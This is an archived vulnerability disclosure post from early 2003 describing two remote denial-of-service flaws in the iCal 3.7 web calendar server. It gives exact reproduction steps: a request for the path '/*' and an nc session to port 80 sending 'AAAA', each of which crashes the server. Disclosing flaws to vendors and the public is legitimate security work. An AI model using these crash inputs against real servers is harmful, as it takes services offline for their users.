PDA

Bekijk Volledige Versie : ical 3.7 remote dos



securma massine
03/01/03, 15:54
--=_NextPart_Caramail_0219401041592247_ID
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

hi
iCal (http://www.brownbearsw.com)is a web-based calendar
that can be used to show meetings,
events, or other schedules. calendars can be viewed,
edited,
and administered totally through the web. iCal is build
for
thin-clients, so access calendar without any plug-ins
or java interpreters.
I found two vulnerabilities has ical 3.7
1-http//target/*
error message:Unable to write to D:\program files\iCl 3.7
Web Calender\*.cal (the server is down)

2-nc target 80
AAAA
[ enter ]
error message:Access violation at address 00403d8b in
module'ICAL.EXE' Read of address 0161c1af

ical is alerted the 26/12/2002


securma massine

__________________________________________________ _______
Gagne une PS2 ! Envoie un SMS avec le code PS au 61166
(0,35€ Hors co=FBt du SMS)


--=_NextPart_Caramail_0219401041592247_ID--